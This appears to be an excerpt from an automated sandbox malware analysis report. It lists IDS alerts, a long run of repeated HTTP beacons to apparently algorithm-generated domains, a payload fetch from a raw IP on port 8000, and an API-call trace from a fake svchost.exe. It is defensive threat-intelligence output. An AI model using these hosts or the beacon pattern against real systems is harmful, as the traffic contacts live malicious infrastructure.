    Source: global trafficTCP traffic: 192.168.2.8:49730 -> 106.15.232.163:8000
    Source: global trafficDNS traffic detected: number of DNS queries: 1003
    Source: Joe Sandbox ViewIP Address: 178.162.217.107
    Source: Joe Sandbox ViewIP Address: 3.94.10.34
    Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49708
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49708
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49718
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49718
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.8:49737
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.8:49737
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.8:58380
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.8:58380
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49740
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:60697
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0433-1952-8ae5-52e851fd8a3a HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731346399.2937263
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731346399.2937263
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0433-4491-9018-901015a08e06 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731346399.2937263; parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478891988923922560
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC4AB0 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02BC4AB0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
